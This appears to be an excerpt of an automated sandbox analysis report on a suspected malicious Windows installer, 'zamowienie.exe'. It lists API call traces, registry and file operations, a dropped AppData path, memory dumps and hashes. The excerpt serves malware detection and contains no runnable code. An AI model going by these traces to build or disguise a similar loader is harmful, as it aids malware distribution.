                                                                                                                                              • LoadLibraryExA.KERNELBASE(00000000,?,?,?,?), ref: 00402105
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                                                                                                                              • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,?,?,?), ref: 0040217F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00405DE9: CharNextA.USER32(?,?,00421D58,?,00405E55,00421D58,00421D58,75923410,?,75922EE0,00405BA0,?,75923410,75922EE0,"C:\Users\user\Desktop\zamowienie.exe"), ref: 00405DF7
                                                                                                                                                • Part of subcall function 00405DE9: CharNextA.USER32(00000000), ref: 00405DFC
                                                                                                                                                • Part of subcall function 00405DE9: CharNextA.USER32(00000000), ref: 00405E10
                                                                                                                                              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,?,00000000,?), ref: 00401632
                                                                                                                                                • Part of subcall function 004059C8: CreateDirectoryA.KERNELBASE(?,?), ref: 00405A0A
                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218,00000000,00000000,?), ref: 00401661
                                                                                                                                              Strings
                                                                                                                                              • C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218, xrefs: 00401656
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218
                                                                                                                                              APIs
                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004054A5
                                                                                                                                              • CallWindowProcA.USER32(?,?,?,?), ref: 004054F6
                                                                                                                                                • Part of subcall function 004044AA: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004044BC
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                              APIs
                                                                                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,00420130,?,?,?,00000000,?,?,00406563,80000002), ref: 004062EB
                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,00406563,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?,?,00420130), ref: 004062F6
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                              • String ID: Call
                                                                                                                                              • API String ID: 3356406503-1824292864
                                                                                                                                              • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                                              • Instruction ID: 208613ee77dfe4ee95d70a32ca0665b8abc8502b02b40dd794cdc2c5f738bbaa
                                                                                                                                              • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                                              • Instruction Fuzzy Hash: AE019A72100209AACF228F60CC09FDB3BA8EF84364F01403AFD16A6190D238D964CBA4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 533cdbfa14bd46aff5f077cc379c2afb520a9fdfce67048ae7eb31f5ce05fb96
                                                                                                                                              • Instruction ID: c33c5666af6c75f79320ec07ff6f5d84745bcd66e348b55f4a383563786f3f76
                                                                                                                                              • Opcode Fuzzy Hash: 533cdbfa14bd46aff5f077cc379c2afb520a9fdfce67048ae7eb31f5ce05fb96
                                                                                                                                              • Instruction Fuzzy Hash: 55A15530E04229CBDF28CFA8C854AADBBB1FF45305F14816ED856BB281C7786986DF45
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b0e7892fc0148d1df718cb7c8fd9528a9bb79f163078764c2ef1885efcb3e637
                                                                                                                                              • Instruction ID: bfcacfd1e6dfbf0b51447c073d542a0936cacb146dbcb40dbfdc372d719c54c7
                                                                                                                                              • Opcode Fuzzy Hash: b0e7892fc0148d1df718cb7c8fd9528a9bb79f163078764c2ef1885efcb3e637
                                                                                                                                              • Instruction Fuzzy Hash: F5912270E04228CBEF28CF98C854BADBBB1FB45305F14816ED852BB291C7786986DF45
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 30c48504e0d06fa89971e82566f802308b9b6acf89f411add0b829b56a0d24bf
                                                                                                                                              • Instruction ID: b46ce3aaeeaae7999688ccec5f61ab74ced10a1bc504861f5df006c548d955ef
                                                                                                                                              • Opcode Fuzzy Hash: 30c48504e0d06fa89971e82566f802308b9b6acf89f411add0b829b56a0d24bf
                                                                                                                                              • Instruction Fuzzy Hash: 2F816571E04228DFDF28CFA8C844BADBBB1FB45305F24816AD816BB291C7785986DF45
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f5f944b03c02af6c76795726ac7589d59d860d35433a8700b0fb93e92ad0fe46
                                                                                                                                              • Instruction ID: 1e33e26d9dce91bb097f2c8bff4565a5e1bf79719f9bb8ed50b812f2e35dede4
                                                                                                                                              • Opcode Fuzzy Hash: f5f944b03c02af6c76795726ac7589d59d860d35433a8700b0fb93e92ad0fe46
                                                                                                                                              • Instruction Fuzzy Hash: 1A814971D04228DFEF28CFA9C844BADBBB1FB45305F10816AD856BB281C7786986DF45
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040333E
                                                                                                                                                • Part of subcall function 004034A9: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004031A7,?), ref: 004034B7
                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403254,00000004,00000000,00000000,?,?,004031CE,000000FF,00000000,00000000,0000000A,?), ref: 00403371
                                                                                                                                              • SetFilePointer.KERNELBASE(00003C4C,00000000,00000000,004138F8,00004000,?,00000000,00403254,00000004,00000000,00000000,?,?,004031CE,000000FF,00000000), ref: 0040346C
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer$CountTick
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1092082344-0
                                                                                                                                              APIs
                                                                                                                                              • GlobalFree.KERNELBASE(008CDF88), ref: 00401C1B
                                                                                                                                              • GlobalAlloc.KERNELBASE(?,00000404), ref: 00401C2D
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                              • String ID: Call
                                                                                                                                              • API String ID: 3394109436-1824292864
                                                                                                                                              APIs
                                                                                                                                              • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025E7
                                                                                                                                              • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025FA
                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz31BB.tmp,00000000,00000011,00000002), ref: 00402612
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Enum$CloseValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 397863658-0
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNELBASE(0000000A,00000000,00000000,00000000,00000000,?,?,004031CE,000000FF,00000000,00000000,0000000A,?), ref: 00403247
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                              • Opcode ID: 30e242b14a2b822041ab8f12606bbed43d081868df01e651b14b32d607499233
                                                                                                                                              • Instruction ID: 4e31b0a15d460e82a6868dcc7a97c97f9d71def9209fb78f02f37c604352801e
                                                                                                                                              • Opcode Fuzzy Hash: 30e242b14a2b822041ab8f12606bbed43d081868df01e651b14b32d607499233
                                                                                                                                              • Instruction Fuzzy Hash: 70319F3010021AFFDB10DF96ED85A9E3FA8EB04355B20803AF914E6190DB38DF519BA9
                                                                                                                                              APIs
                                                                                                                                              • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00402573
                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz31BB.tmp,00000000,00000011,00000002), ref: 00402612
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3356406503-0
                                                                                                                                              • Opcode ID: f341fab6c4d5d9e143f9a39c8857dafa6d1c3b959e35e13e3f3f87eeb1339b35
                                                                                                                                              • Instruction ID: 27f22e72776e534b7518d78bf4125aa2de7fa147ee0fcb7e23e1e5dcbb4dd508
                                                                                                                                              • Opcode Fuzzy Hash: f341fab6c4d5d9e143f9a39c8857dafa6d1c3b959e35e13e3f3f87eeb1339b35
                                                                                                                                              • Instruction Fuzzy Hash: 6011E371905205EFDF20CF60CA985AE7BB4EF41344F20883FE442B72C0D6B98A45DB2A
                                                                                                                                              APIs
                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                              • Opcode ID: 0c5789fd138260514d082d02416d4df913b42f9f9632ac62ea02531d6497fcc4
                                                                                                                                              • Instruction ID: f90f8baee40fd2ad2ebd870fe85d102dfcd66f1b25247bd42a8a5a06ccf829ae
                                                                                                                                              • Opcode Fuzzy Hash: 0c5789fd138260514d082d02416d4df913b42f9f9632ac62ea02531d6497fcc4
                                                                                                                                              • Instruction Fuzzy Hash: 2101F4317202109BE7295F389D04B2A36A8E714315F10823FF895F61F1DA78DC038B4D
                                                                                                                                              APIs
                                                                                                                                              • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040246F
                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402478
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseDeleteValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2831762973-0
                                                                                                                                              • Opcode ID: 7a7d4ca3cf7b68813273955a19fe3f7db77441c35217859e8440f37874624791
                                                                                                                                              • Instruction ID: e1f05abede15ecbb2c146e6edb2cb91af218c767d3863478ae3f90e70a82c0a4
                                                                                                                                              • Opcode Fuzzy Hash: 7a7d4ca3cf7b68813273955a19fe3f7db77441c35217859e8440f37874624791
                                                                                                                                              • Instruction Fuzzy Hash: 03F0BB32A04121ABEB60EBA49F4DABE72A99B40315F25003FF501B71C1D9F84E42866E
                                                                                                                                              APIs
                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,?), ref: 00405A0A
                                                                                                                                              • GetLastError.KERNEL32 ref: 00405A18
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                              • Opcode ID: 6a1283def284ae2da235a8de8de440d50ddb230b130f4cbec3169f4b243e88d9
                                                                                                                                              • Instruction ID: eb4af4dd0c534903fe99289be2cea4467e3b295a60047e55610cfbb868e6ccdb
                                                                                                                                              • Opcode Fuzzy Hash: 6a1283def284ae2da235a8de8de440d50ddb230b130f4cbec3169f4b243e88d9
                                                                                                                                              • Instruction Fuzzy Hash: 70F0BD71D10209EBDF01DFA4D5497DFBBF4AF04315F10817AD451B6280D7B982598FA9
                                                                                                                                              APIs
                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401F08
                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401F13
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$EnableShow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1136574915-0
                                                                                                                                              • Opcode ID: 48ee10a0f6d495821d6d0eaf072cde0f0566fd2bad53c27f28243038c5da5e20
                                                                                                                                              • Instruction ID: 9c481bcdf8b2feaaba5878e910a608199c1a4b3810ffe6955d5d808e0a2afacb
                                                                                                                                              • Opcode Fuzzy Hash: 48ee10a0f6d495821d6d0eaf072cde0f0566fd2bad53c27f28243038c5da5e20
                                                                                                                                              • Instruction Fuzzy Hash: EDE0D832A082049FEF64EBA4FE8556F77B0EB90325B20443FE001F10C2CA7849428A5D
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422158,00426800,00426800,00426800,?,948,00000000), ref: 00405A80
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405A8D
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3712363035-0
                                                                                                                                              • Opcode ID: ab581ddd3fda7b37a8f125a330bfa88cdadf53e3127e255e3fee9c89dfd7c3ea
                                                                                                                                              • Instruction ID: c84a9a15433e64c4cbb2df3d230690adcd9c92945636d4ae6b18afee34dce5d0
                                                                                                                                              • Opcode Fuzzy Hash: ab581ddd3fda7b37a8f125a330bfa88cdadf53e3127e255e3fee9c89dfd7c3ea
                                                                                                                                              • Instruction Fuzzy Hash: 4FE04FB060020ABFEB109F60ED09F7B776CEB00244F418421BE10F2250D67498658A78
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000000,?,00403633,?), ref: 004067F8
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406813
                                                                                                                                                • Part of subcall function 00406778: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040678F
                                                                                                                                                • Part of subcall function 00406778: wsprintfA.USER32 ref: 004067C8
                                                                                                                                                • Part of subcall function 00406778: LoadLibraryExA.KERNELBASE(?,00000000,?), ref: 004067DC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNELBASE(00000003,00402FC4,C:\Users\user\Desktop\zamowienie.exe,80000000,00000003), ref: 00405F55
                                                                                                                                              • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F77
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                              APIs
                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,00000000,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00405A28
                                                                                                                                              • GetLastError.KERNEL32(?,?,0000000A,?), ref: 00405A36
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                              APIs
                                                                                                                                              • EnumWindows.USER32(00000000), ref: 73402B87
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2469733546.0000000073401000.00000020.00000001.01000000.00000005.sdmp, Offset: 73400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2469658319.0000000073400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2469810438.0000000073404000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2469862791.0000000073406000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_73400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnumWindows
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1129996299-0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2111968516-0
                                                                                                                                              APIs
                                                                                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 004016AA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileMove
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3562171763-0
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402776
                                                                                                                                                • Part of subcall function 0040631C: wsprintfA.USER32 ref: 00406329
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointerwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 327478801-0
                                                                                                                                              APIs
                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402402
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfileStringWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 390214022-0
                                                                                                                                              APIs
                                                                                                                                              • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401758
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PathSearch
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2203818243-0
                                                                                                                                              APIs
                                                                                                                                              • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402D0F,00000000,?,?), ref: 0040629B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNELBASE(0000000A,00000000,00000000,00000000,00000000,004138F8,0040B8F8,004034A6,0000000A,0000000A,004033AA,004138F8,00004000,?,00000000,00403254), ref: 00405FDD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                              APIs
